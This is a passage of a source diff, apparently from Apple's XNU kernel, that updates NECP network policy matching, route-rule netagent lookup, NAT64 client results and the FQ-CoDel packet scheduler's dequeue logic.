sock_proc : curr_proc); + } + if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_PLATFORM_BINARY) { info->is_platform_binary = necp_is_platform_binary(sock_proc ? sock_proc : curr_proc) ? true : false; } + if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) { + proc_t real_proc = curr_proc; + bool release_real_proc = false; + if (so->last_pid != proc_pid(real_proc)) { + if (so->last_pid == socket_pid && sock_proc != NULL) { + real_proc = sock_proc; + } else { + proc_t last_proc = proc_find(so->last_pid); + if (last_proc != NULL) { + real_proc = last_proc; + release_real_proc = true; + } + } + } + if (real_proc != NULL) { + info->real_is_platform_binary = (necp_is_platform_binary(real_proc) ? true : false); + if (release_real_proc) { + proc_rele(real_proc); + } + } + } + if (necp_kernel_socket_policies_condition_mask & NECP_KERNEL_CONDITION_ACCOUNT_ID && inp->inp_necp_attributes.inp_account != NULL) { struct necp_string_id_mapping *existing_mapping = necp_lookup_string_to_id_locked(&necp_account_id_list, inp->inp_necp_attributes.inp_account); if (existing_mapping) { @@ -7850,7 +8030,7 @@ necp_socket_find_policy_match_with_info_locked(struct necp_kernel_socket_policy continue; } - if (necp_socket_check_policy(policy_search_array[i], info->application_id, info->real_application_id, info->cred_result, info->account_id, domain_substring, domain_dot_count, info->pid, info->uid, info->bound_interface_index, info->traffic_class, info->protocol, &info->local_addr, &info->remote_addr, required_agent_types, num_required_agent_types, info->has_client, info->client_flags, info->is_platform_binary, proc, pf_tag, rt, info->is_loopback)) { + if (necp_socket_check_policy(policy_search_array[i], info->application_id, info->real_application_id, info->cred_result, info->account_id, domain_substring, domain_dot_count, info->pid, info->pid_version, info->uid, info->bound_interface_index, info->traffic_class, 
info->protocol, &info->local_addr, &info->remote_addr, required_agent_types, num_required_agent_types, info->has_client, info->client_flags, info->is_platform_binary, proc, pf_tag, rt, info->is_loopback, info->real_is_platform_binary, info->is_delegated)) { if (policy_search_array[i]->result == NECP_KERNEL_POLICY_RESULT_SOCKET_FILTER) { if (return_filter && *return_filter != NECP_FILTER_UNIT_NO_FILTER) { necp_kernel_policy_filter control_unit = policy_search_array[i]->result_parameter.filter_control_unit; @@ -8114,7 +8294,7 @@ necp_socket_find_policy_match(struct inpcb *inp, struct sockaddr *override_local // Lock lck_rw_lock_shared(&necp_kernel_policy_lock); - necp_socket_fillout_info_locked(inp, override_local_addr, override_remote_addr, override_bound_interface, drop_order, &socket_proc, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK)); + necp_socket_fillout_info_locked(inp, override_local_addr, override_remote_addr, override_bound_interface, false, drop_order, &socket_proc, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK)); // Check info u_int32_t flowhash = necp_socket_calc_flowhash_locked(&info); @@ -8363,7 +8543,8 @@ necp_socket_find_policy_match(struct inpcb *inp, struct sockaddr *override_local necp_socket_ip_tunnel_tso(inp); } - if (send_local_network_denied_event) { + if (send_local_network_denied_event && inp->inp_policyresult.network_denied_notifies == 0) { + inp->inp_policyresult.network_denied_notifies++; necp_send_network_denied_event(((so->so_flags & SOF_DELEGATED) ? so->e_pid : so->last_pid), ((so->so_flags & SOF_DELEGATED) ? 
so->e_uuid : so->last_uuid), NETPOLICY_NETWORKTYPE_LOCAL); @@ -9550,6 +9731,70 @@ necp_route_is_allowed(struct rtentry *route, struct ifnet *interface, u_int32_t return TRUE; } +static uint32_t +necp_route_get_netagent(struct rtentry *route, u_int32_t route_rule_id) /* Returns the netagent id of the route rule when one of its USE_NETAGENT actions applies to the route's interface, else 0 */ +{ + if (route == NULL) { + return 0; + } + + struct ifnet *ifp = route->rt_ifp; + if (ifp == NULL) { + return 0; + } + + struct necp_route_rule *route_rule = necp_lookup_route_rule_locked(&necp_route_rules, route_rule_id); + if (route_rule == NULL) { + return 0; + } + + // No netagent, skip + if (route_rule->netagent_id == 0) { + return 0; + } + + if (route_rule->default_action == NECP_ROUTE_RULE_USE_NETAGENT) { /* default action is checked before any interface-specific action */ + return route_rule->netagent_id; + } + + for (int exception_index = 0; exception_index < MAX_ROUTE_RULE_INTERFACES; exception_index++) { + if (route_rule->exception_if_indices[exception_index] == 0) { /* a zero interface index ends the scan of the exception list */ + break; + } + if (route_rule->exception_if_indices[exception_index] == ifp->if_index && + route_rule->exception_if_actions[exception_index] == NECP_ROUTE_RULE_USE_NETAGENT) { + return route_rule->netagent_id; + } + } + + if (route_rule->cellular_action == NECP_ROUTE_RULE_USE_NETAGENT && + ifp->if_type == IFT_CELLULAR) { + return route_rule->netagent_id; + } + + if (route_rule->wifi_action == NECP_ROUTE_RULE_USE_NETAGENT && + ifp->if_family == IFNET_FAMILY_ETHERNET && ifp->if_subfamily == IFNET_SUBFAMILY_WIFI) { + return route_rule->netagent_id; + } + + if (route_rule->wired_action == NECP_ROUTE_RULE_USE_NETAGENT && + (ifp->if_family == IFNET_FAMILY_ETHERNET || ifp->if_family == IFNET_FAMILY_FIREWIRE)) { + return route_rule->netagent_id; + } + + if (route_rule->expensive_action == NECP_ROUTE_RULE_USE_NETAGENT && + ifp->if_eflags & IFEF_EXPENSIVE) { + return route_rule->netagent_id; + } + + if (route_rule->constrained_action == NECP_ROUTE_RULE_USE_NETAGENT && + ifp->if_xflags & IFXF_CONSTRAINED) { + return route_rule->netagent_id; + } + + return 0; /* no USE_NETAGENT action matched this interface */ +} + bool 
necp_packet_is_allowed_over_interface(struct mbuf *packet, struct ifnet *interface) { @@ -9604,9 +9849,9 @@ necp_packet_filter_tags_receive(u_int16_t pf_tag, u_int32_t pass_flags) } static bool -necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr *override_local_addr, struct sockaddr *override_remote_addr, ifnet_t interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags) +necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr *override_local_addr, struct sockaddr *override_remote_addr, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags) { - u_int32_t verifyifindex = interface ? interface->if_index : 0; + u_int32_t verifyifindex = input_interface ? input_interface->if_index : 0; bool allowed_to_receive = TRUE; struct necp_socket_info info; u_int32_t flowhash = 0; @@ -9672,7 +9917,7 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr } else { if (inp->inp_policyresult.results.route_rule_id != 0) { lck_rw_lock_shared(&necp_kernel_policy_lock); - if (!necp_route_is_allowed(route, interface, inp->inp_policyresult.results.route_rule_id, &interface_type_denied)) { + if (!necp_route_is_allowed(route, input_interface, inp->inp_policyresult.results.route_rule_id, &interface_type_denied)) { route_allowed = FALSE; } lck_rw_done(&necp_kernel_policy_lock); @@ -9683,7 +9928,7 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr if (!route_allowed || inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_DROP || inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_SOCKET_DIVERT || - (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && interface && + 
(inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && input_interface && inp->inp_policyresult.results.result_parameter.tunnel_interface_index != verifyifindex)) { allowed_to_receive = FALSE; } else { @@ -9713,7 +9958,7 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr // Actually calculate policy result lck_rw_lock_shared(&necp_kernel_policy_lock); - necp_socket_fillout_info_locked(inp, override_local_addr, override_remote_addr, 0, drop_order, &socket_proc, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK)); + necp_socket_fillout_info_locked(inp, override_local_addr, override_remote_addr, 0, input_interface != NULL ? true : false, drop_order, &socket_proc, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK)); flowhash = necp_socket_calc_flowhash_locked(&info); if (inp->inp_policyresult.policy_id != NECP_KERNEL_POLICY_ID_NONE && @@ -9721,10 +9966,10 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr inp->inp_policyresult.flowhash == flowhash) { if (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_DROP || inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_SOCKET_DIVERT || - (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && interface && + (inp->inp_policyresult.results.result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && input_interface && inp->inp_policyresult.results.result_parameter.tunnel_interface_index != verifyifindex) || (inp->inp_policyresult.results.route_rule_id != 0 && - !necp_route_is_allowed(route, interface, inp->inp_policyresult.results.route_rule_id, &interface_type_denied))) { + !necp_route_is_allowed(route, input_interface, inp->inp_policyresult.results.route_rule_id, &interface_type_denied))) { allowed_to_receive = FALSE; } else { if (return_policy_id) { @@ -9780,13 +10025,13 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr if (matched_policy->result == 
NECP_KERNEL_POLICY_RESULT_DROP || matched_policy->result == NECP_KERNEL_POLICY_RESULT_SOCKET_DIVERT || - (matched_policy->result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && interface && + (matched_policy->result == NECP_KERNEL_POLICY_RESULT_IP_TUNNEL && input_interface && matched_policy->result_parameter.tunnel_interface_index != verifyifindex) || ((service_action == NECP_KERNEL_POLICY_RESULT_TRIGGER_SCOPED || service_action == NECP_KERNEL_POLICY_RESULT_NO_TRIGGER_SCOPED) && service.identifier != 0 && service.identifier != NECP_NULL_SERVICE_ID) || (route_rule_id != 0 && - !necp_route_is_allowed(route, interface, route_rule_id, &interface_type_denied)) || + !necp_route_is_allowed(route, input_interface, route_rule_id, &interface_type_denied)) || !necp_netagents_allow_traffic(netagent_ids, NECP_MAX_NETAGENTS)) { allowed_to_receive = FALSE; } else { @@ -9845,7 +10090,8 @@ necp_socket_is_allowed_to_send_recv_internal(struct inpcb *inp, struct sockaddr lck_rw_done(&necp_kernel_policy_lock); - if (send_local_network_denied_event) { + if (send_local_network_denied_event && inp->inp_policyresult.network_denied_notifies == 0) { + inp->inp_policyresult.network_denied_notifies++; necp_send_network_denied_event(((so->so_flags & SOF_DELEGATED) ? so->e_pid : so->last_pid), ((so->so_flags & SOF_DELEGATED) ? 
so->e_uuid : so->last_uuid), NETPOLICY_NETWORKTYPE_LOCAL); @@ -9872,7 +10118,7 @@ done: } bool -necp_socket_is_allowed_to_send_recv_v4(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in_addr *local_addr, struct in_addr *remote_addr, ifnet_t interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags) +necp_socket_is_allowed_to_send_recv_v4(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in_addr *local_addr, struct in_addr *remote_addr, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags) { struct sockaddr_in local = {}; struct sockaddr_in remote = {}; @@ -9883,12 +10129,12 @@ necp_socket_is_allowed_to_send_recv_v4(struct inpcb *inp, u_int16_t local_port, memcpy(&local.sin_addr, local_addr, sizeof(local.sin_addr)); memcpy(&remote.sin_addr, remote_addr, sizeof(remote.sin_addr)); - return necp_socket_is_allowed_to_send_recv_internal(inp, (struct sockaddr *)&local, (struct sockaddr *)&remote, interface, + return necp_socket_is_allowed_to_send_recv_internal(inp, (struct sockaddr *)&local, (struct sockaddr *)&remote, input_interface, pf_tag, return_policy_id, return_route_rule_id, return_skip_policy_id, return_pass_flags); } bool -necp_socket_is_allowed_to_send_recv_v6(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in6_addr *local_addr, struct in6_addr *remote_addr, ifnet_t interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags) +necp_socket_is_allowed_to_send_recv_v6(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in6_addr *local_addr, struct in6_addr *remote_addr, ifnet_t input_interface, u_int16_t 
pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags) { struct sockaddr_in6 local = {}; struct sockaddr_in6 remote = {}; @@ -9899,15 +10145,15 @@ necp_socket_is_allowed_to_send_recv_v6(struct inpcb *inp, u_int16_t local_port, memcpy(&local.sin6_addr, local_addr, sizeof(local.sin6_addr)); memcpy(&remote.sin6_addr, remote_addr, sizeof(remote.sin6_addr)); - return necp_socket_is_allowed_to_send_recv_internal(inp, (struct sockaddr *)&local, (struct sockaddr *)&remote, interface, + return necp_socket_is_allowed_to_send_recv_internal(inp, (struct sockaddr *)&local, (struct sockaddr *)&remote, input_interface, pf_tag, return_policy_id, return_route_rule_id, return_skip_policy_id, return_pass_flags); } bool -necp_socket_is_allowed_to_send_recv(struct inpcb *inp, ifnet_t interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, +necp_socket_is_allowed_to_send_recv(struct inpcb *inp, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags) { - return necp_socket_is_allowed_to_send_recv_internal(inp, NULL, NULL, interface, pf_tag, + return necp_socket_is_allowed_to_send_recv_internal(inp, NULL, NULL, input_interface, pf_tag, return_policy_id, return_route_rule_id, return_skip_policy_id, return_pass_flags); } diff --git a/bsd/net/necp.h b/bsd/net/necp.h index c2f39c6af..28c553dea 100644 --- a/bsd/net/necp.h +++ b/bsd/net/necp.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2013-2020 Apple Inc. All rights reserved. + * Copyright (c) 2013-2021 Apple Inc. All rights reserved. 
* * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -153,6 +153,7 @@ struct necp_packet_header { #define NECP_POLICY_CONDITION_SDK_VERSION 28 // struct necp_policy_condition_sdk_version #define NECP_POLICY_CONDITION_SIGNING_IDENTIFIER 29 // String #define NECP_POLICY_CONDITION_PACKET_FILTER_TAGS 30 // u_int16_t +#define NECP_POLICY_CONDITION_DELEGATE_IS_PLATFORM_BINARY 32 // N/A /* * Policy Packet tags @@ -203,6 +204,7 @@ struct necp_packet_header { #define NECP_ROUTE_RULE_ALLOW_INTERFACE 2 // String, or empty to match all #define NECP_ROUTE_RULE_QOS_MARKING 3 // String, or empty to match all #define NECP_ROUTE_RULE_DENY_LQM_ABORT 4 // String, or empty to match all +#define NECP_ROUTE_RULE_USE_NETAGENT 5 // UUID, followed by string or empty #define NECP_ROUTE_RULE_FLAG_CELLULAR 0x01 #define NECP_ROUTE_RULE_FLAG_WIFI 0x02 @@ -311,6 +313,7 @@ struct necp_aggregate_result { u_int32_t policy_id; uuid_t netagents[NECP_MAX_NETAGENTS]; u_int32_t netagent_use_flags[NECP_MAX_NETAGENTS]; + struct ipv6_prefix nat64_prefixes[NAT64_MAX_NUM_PREFIXES]; u_int8_t mss_recommended; }; @@ -645,6 +648,7 @@ typedef struct necp_cache_buffer { #define NECP_CLIENT_RESULT_EFFECTIVE_TRAFFIC_CLASS 210 // u_int32_t #define NECP_CLIENT_RESULT_TRAFFIC_MGMT_BG 211 // u_int32_t, 1: background, 0: not background #define NECP_CLIENT_RESULT_GATEWAY 212 // struct necp_client_endpoint +#define NECP_CLIENT_RESULT_NAT64 213 // struct ipv6_prefix[NAT64_MAX_NUM_PREFIXES] #define NECP_CLIENT_RESULT_FLAG_IS_LOCAL 0x0001 // Routes to this device #define NECP_CLIENT_RESULT_FLAG_IS_DIRECT 0x0002 // Routes to directly accessible peer @@ -948,6 +952,8 @@ extern int necp_buffer_find_tlv(u_int8_t *buffer, u_int32_t buffer_length, int o #define NECPCTL_RESTRICT_MULTICAST 20 /* Restrict multicast access */ #define NECPCTL_DEDUP_POLICIES 21 /* Dedup overlapping policies */ +#define NECP_LOOPBACK_PASS_ALL 1 // Pass all loopback traffic +#define NECP_LOOPBACK_PASS_WITH_FILTER 2 // Pass all loopback traffic, but activate 
content filter and/or flow divert if applicable #define NECPCTL_NAMES { \ { 0, 0 }, \ @@ -1047,6 +1053,7 @@ struct necp_kernel_socket_policy { struct necp_policy_condition_sdk_version cond_sdk_version; char *cond_signing_identifier; // String u_int16_t cond_packet_filter_tags; + int32_t cond_pid_version; necp_kernel_policy_result result; necp_kernel_policy_result_parameter result_parameter; @@ -1116,12 +1123,13 @@ struct necp_aggregate_socket_result { }; struct necp_inpcb_result { - u_int32_t app_id; + u_int32_t app_id; necp_kernel_policy_id policy_id; necp_kernel_policy_id skip_policy_id; - int32_t policy_gencount; - u_int32_t flowhash; - struct necp_aggregate_socket_result results; + int32_t policy_gencount; + u_int32_t flowhash; + u_int32_t network_denied_notifies;// Notification count + struct necp_aggregate_socket_result results; }; extern errno_t necp_init(void); @@ -1142,18 +1150,18 @@ extern u_int32_t necp_socket_get_effective_mtu(struct inpcb *inp, u_int32_t curr extern bool necp_socket_is_allowed_to_recv_on_interface(struct inpcb *inp, ifnet_t interface); -extern bool necp_socket_is_allowed_to_send_recv(struct inpcb *inp, ifnet_t interface, u_int16_t pf_tag, +extern bool necp_socket_is_allowed_to_send_recv(struct inpcb *inp, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags); extern bool necp_socket_is_allowed_to_send_recv_v4(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, struct in_addr *local_addr, - struct in_addr *remote_addr, ifnet_t interface, u_int16_t pf_tag, + struct in_addr *remote_addr, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags); extern bool necp_socket_is_allowed_to_send_recv_v6(struct inpcb *inp, u_int16_t local_port, u_int16_t remote_port, 
struct in6_addr *local_addr, - struct in6_addr *remote_addr, ifnet_t interface, u_int16_t pf_tag, + struct in6_addr *remote_addr, ifnet_t input_interface, u_int16_t pf_tag, necp_kernel_policy_id *return_policy_id, u_int32_t *return_route_rule_id, necp_kernel_policy_id *return_skip_policy_id, u_int32_t *return_pass_flags); extern void necp_socket_update_qos_marking(struct inpcb *inp, struct rtentry *route, u_int32_t route_rule_id); diff --git a/bsd/net/necp_client.c b/bsd/net/necp_client.c index 0ef2776e3..bcd49fb78 100644 --- a/bsd/net/necp_client.c +++ b/bsd/net/necp_client.c @@ -1484,11 +1484,12 @@ static void necp_client_add_interface_option_if_needed(struct necp_client *client, uint32_t interface_index, uint32_t interface_generation, - uuid_t *nexus_agent) + uuid_t *nexus_agent, + bool network_provider) { - if (interface_index == IFSCOPE_NONE || + if ((interface_index == IFSCOPE_NONE && !network_provider) || (client->interface_option_count != 0 && !client->allow_multiple_flows)) { - // Interface not set, or client not allowed to use this mode + // Interface or agent not set, or client not allowed to use this mode return; } @@ -1913,7 +1914,8 @@ necp_client_add_browse_interface_options(struct necp_client *client, (flags & NETAGENT_FLAG_SUPPORTS_BROWSE) && (!(flags & NETAGENT_FLAG_SPECIFIC_USE_ONLY) || necp_netagent_is_required(parsed_parameters, &ifp->if_agentids[i]))) { - necp_client_add_interface_option_if_needed(client, ifp->if_index, ifnet_get_generation(ifp), &ifp->if_agentids[i]); + necp_client_add_interface_option_if_needed(client, ifp->if_index, ifnet_get_generation(ifp), + &ifp->if_agentids[i], (flags & NETAGENT_FLAG_NETWORK_PROVIDER)); // Finding one is enough break; @@ -3531,6 +3533,15 @@ necp_update_client_result(proc_t proc, client->result, sizeof(client->result)); } + for (int i = 0; i < NAT64_MAX_NUM_PREFIXES; i++) { + if (result.nat64_prefixes[i].prefix_len != 0) { + cursor = necp_buffer_write_tlv_if_different(cursor, NECP_CLIENT_RESULT_NAT64, + 
sizeof(result.nat64_prefixes), result.nat64_prefixes, &updated, + client->result, sizeof(client->result)); + break; + } + } + if (result.mss_recommended != 0) { cursor = necp_buffer_write_tlv_if_different(cursor, NECP_CLIENT_RESULT_RECOMMENDED_MSS, sizeof(result.mss_recommended), &result.mss_recommended, &updated, @@ -3616,7 +3627,7 @@ necp_update_client_result(proc_t proc, if (necp_ifnet_matches_parameters(multi_interface, parsed_parameters, 0, NULL, true, false)) { // Add multipath interface flows for kernel MPTCP necp_client_add_interface_option_if_needed(client, multi_interface->if_index, - ifnet_get_generation(multi_interface), NULL); + ifnet_get_generation(multi_interface), NULL, false); // Add nexus agents for multipath necp_client_add_agent_interface_options(client, parsed_parameters, multi_interface); @@ -3631,7 +3642,7 @@ necp_update_client_result(proc_t proc, // Add interface option in case it is not a nexus necp_client_add_interface_option_if_needed(client, direct_interface->if_index, - ifnet_get_generation(direct_interface), NULL); + ifnet_get_generation(direct_interface), NULL, false); } } else { // Get listener interface options from global list @@ -5635,7 +5646,8 @@ necp_client_add_flow(struct necp_fd_data *fd_data, struct necp_client_action_arg goto done; } - if (uap->buffer == 0 || buffer_size < sizeof(struct necp_client_add_flow)) { + if (uap->buffer == 0 || buffer_size < sizeof(struct necp_client_add_flow) || + buffer_size > sizeof(struct necp_client_add_flow_default) * 4) { error = EINVAL; NECPLOG(LOG_ERR, "necp_client_add_flow invalid buffer (length %zu)", buffer_size); goto done; diff --git a/bsd/net/pktsched/pktsched_fq_codel.c b/bsd/net/pktsched/pktsched_fq_codel.c index b34473e8b..c7d058ec2 100644 --- a/bsd/net/pktsched/pktsched_fq_codel.c +++ b/bsd/net/pktsched/pktsched_fq_codel.c @@ -29,21 +29,49 @@ #include #include #include +#include #include #include #include #include #include +#include + +#define FQ_CODEL_DEFAULT_QUANTUM 1500 + 
+#define FQ_CODEL_QUANTUM_BK_SYS(_q) (_q) +#define FQ_CODEL_QUANTUM_BK(_q) (_q) +#define FQ_CODEL_QUANTUM_BE(_q) (_q) +#define FQ_CODEL_QUANTUM_RD(_q) (_q) +#define FQ_CODEL_QUANTUM_OAM(_q) (_q) +#define FQ_CODEL_QUANTUM_AV(_q) (_q * 2) +#define FQ_CODEL_QUANTUM_RV(_q) (_q * 2) +#define FQ_CODEL_QUANTUM_VI(_q) (_q * 2) +#define FQ_CODEL_QUANTUM_VO(_q) ((_q * 2) / 5) +#define FQ_CODEL_QUANTUM_CTL(_q) ((_q * 2) / 5) + +#define FQ_CODEL_DRR_MAX_BK_SYS 2 +#define FQ_CODEL_DRR_MAX_BK 2 +#define FQ_CODEL_DRR_MAX_BE 4 +#define FQ_CODEL_DRR_MAX_RD 4 +#define FQ_CODEL_DRR_MAX_OAM 4 +#define FQ_CODEL_DRR_MAX_AV 6 +#define FQ_CODEL_DRR_MAX_RV 6 +#define FQ_CODEL_DRR_MAX_VI 6 +#define FQ_CODEL_DRR_MAX_VO 8 +#define FQ_CODEL_DRR_MAX_CTL 8 static ZONE_DECLARE(fq_if_zone, "pktsched_fq_if", sizeof(fq_if_t), ZC_ZFREE_CLEARMEM); +typedef STAILQ_HEAD(, flowq) flowq_dqlist_t; + static fq_if_t *fq_if_alloc(struct ifnet *, classq_pkt_type_t); static void fq_if_destroy(fq_if_t *fqs); static void fq_if_classq_init(fq_if_t *fqs, uint32_t priority, uint16_t quantum, uint32_t drr_max, uint32_t svc_class); static void fq_if_dequeue(fq_if_t *, fq_if_classq_t *, uint32_t, int64_t, classq_pkt_t *, classq_pkt_t *, uint32_t *, - uint32_t *, boolean_t drvmgmt); + uint32_t *, flowq_dqlist_t *, boolean_t drvmgmt); void fq_if_stat_sc(fq_if_t *fqs, cqrq_stat_sc_t *stat); static void fq_if_purge(fq_if_t *); static void fq_if_purge_classq(fq_if_t *, fq_if_classq_t *); @@ -51,7 +79,7 @@ static void fq_if_purge_flow(fq_if_t *, fq_t *, u_int32_t *, u_int32_t *); static void fq_if_empty_new_flow(fq_t *fq, fq_if_classq_t *fq_cl, bool add_to_old); static void fq_if_empty_old_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, - fq_t *fq, bool remove_hash); + fq_t *fq, bool remove_hash, bool destroy); #define FQ_IF_FLOW_HASH_ID(_flowid_) \ (((_flowid_) >> FQ_IF_HASH_TAG_SHIFT) & FQ_IF_HASH_TAG_MASK) @@ -75,8 +103,8 @@ fq_if_append_mbuf(classq_pkt_t *pkt, classq_pkt_t *next_pkt) static boolean_t fq_getq_flow_mbuf(fq_if_t 
*fqs, fq_if_classq_t *fq_cl, fq_t *fq, - int64_t byte_limit, u_int32_t pkt_limit, classq_pkt_t *top, - classq_pkt_t *last, u_int32_t *byte_cnt, u_int32_t *pkt_cnt, + int64_t byte_limit, u_int32_t pkt_limit, classq_pkt_t *head, + classq_pkt_t *tail, u_int32_t *byte_cnt, u_int32_t *pkt_cnt, boolean_t *qempty, u_int32_t pflags) { u_int32_t plen; @@ -95,15 +123,15 @@ fq_getq_flow_mbuf(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq, fq->fq_deficit -= plen; pkt.pktsched_pkt_mbuf->m_pkthdr.pkt_flags |= pflags; - if (top->cp_mbuf == NULL) { - *top = pkt.pktsched_pkt; + if (head->cp_mbuf == NULL) { + *head = pkt.pktsched_pkt; } else { - ASSERT(last->cp_mbuf != NULL); - ASSERT(last->cp_mbuf->m_nextpkt == NULL); - last->cp_mbuf->m_nextpkt = pkt.pktsched_pkt_mbuf; + ASSERT(tail->cp_mbuf != NULL); + ASSERT(tail->cp_mbuf->m_nextpkt == NULL); + tail->cp_mbuf->m_nextpkt = pkt.pktsched_pkt_mbuf; } - *last = pkt.pktsched_pkt; - last->cp_mbuf->m_nextpkt = NULL; + *tail = pkt.pktsched_pkt; + tail->cp_mbuf->m_nextpkt = NULL; fq_cl->fcl_stat.fcl_dequeue++; fq_cl->fcl_stat.fcl_dequeue_bytes += plen; *pkt_cnt += 1; @@ -321,6 +349,11 @@ fq_if_enqueue_classq(struct ifclassq *ifq, classq_pkt_t *head, IFCQ_INC_BYTES(ifq, bytes); IFCQ_UNLOCK(ifq); done: +#if DEBUG || DEVELOPMENT + if (__improbable((ret == EQFULL) && (ifclassq_flow_control_adv == 0))) { + ret = 0; + } +#endif /* DEBUG || DEVELOPMENT */ return ret; } @@ -344,22 +377,80 @@ fq_if_dequeue_sc_classq(struct ifclassq *ifq, mbuf_svc_class_t svc, fq_cl = &fqs->fqs_classq[pri]; fq_if_dequeue(fqs, fq_cl, 1, CLASSQ_DEQUEUE_MAX_BYTE_LIMIT, - pkt, NULL, &total_pktcnt, &total_bytecnt, TRUE); + pkt, NULL, &total_pktcnt, &total_bytecnt, NULL, TRUE); IFCQ_XMIT_ADD(ifq, total_pktcnt, total_bytecnt); } +static inline void +fq_dqlist_add(flowq_dqlist_t *fq_dqlist_head, fq_t *fq) +{ + ASSERT(fq->fq_dq_head.cp_mbuf == NULL); + ASSERT(!fq->fq_in_dqlist); + STAILQ_INSERT_TAIL(fq_dqlist_head, fq, fq_dqlink); + fq->fq_in_dqlist = true; +} + +static inline 
void +fq_dqlist_remove(flowq_dqlist_t *fq_dqlist_head, fq_t *fq, classq_pkt_t *head, + classq_pkt_t *tail) +{ + ASSERT(fq->fq_in_dqlist); + if (fq->fq_dq_head.cp_mbuf == NULL) { + goto done; + } + + if (head->cp_mbuf == NULL) { + *head = fq->fq_dq_head; + } else { + ASSERT(tail->cp_mbuf != NULL); + + switch (fq->fq_ptype) { + case QP_MBUF: + ASSERT(tail->cp_mbuf->m_nextpkt == NULL); + tail->cp_mbuf->m_nextpkt = fq->fq_dq_head.cp_mbuf; + ASSERT(fq->fq_dq_tail.cp_mbuf->m_nextpkt == NULL); + break; + default: + VERIFY(0); + /* NOTREACHED */ + __builtin_unreachable(); + } + } + *tail = fq->fq_dq_tail; +done: + STAILQ_REMOVE(fq_dqlist_head, fq, flowq, fq_dqlink); + CLASSQ_PKT_INIT(&fq->fq_dq_head); + CLASSQ_PKT_INIT(&fq->fq_dq_tail); + fq->fq_in_dqlist = false; + if (fq->fq_flags & FQF_DESTROYED) { + fq_destroy(fq); + } +} + +static inline void +fq_dqlist_get_packet_list(flowq_dqlist_t *fq_dqlist_head, classq_pkt_t *head, + classq_pkt_t *tail) +{ + fq_t *fq, *tfq; + + STAILQ_FOREACH_SAFE(fq, fq_dqlist_head, fq_dqlink, tfq) { + fq_dqlist_remove(fq_dqlist_head, fq, head, tail); + } +} + int fq_if_dequeue_classq_multi(struct ifclassq *ifq, u_int32_t maxpktcnt, u_int32_t maxbytecnt, classq_pkt_t *first_packet, classq_pkt_t *last_packet, u_int32_t *retpktcnt, u_int32_t *retbytecnt) { - u_int32_t pktcnt = 0, bytecnt = 0, total_pktcnt = 0, total_bytecnt = 0; + uint32_t total_pktcnt = 0, total_bytecnt = 0; classq_pkt_t first = CLASSQ_PKT_INITIALIZER(fisrt); classq_pkt_t last = CLASSQ_PKT_INITIALIZER(last); classq_pkt_t tmp = CLASSQ_PKT_INITIALIZER(tmp); fq_if_append_pkt_t append_pkt; + flowq_dqlist_t fq_dqlist_head; fq_if_classq_t *fq_cl; fq_if_t *fqs; int pri; @@ -367,6 +458,7 @@ fq_if_dequeue_classq_multi(struct ifclassq *ifq, 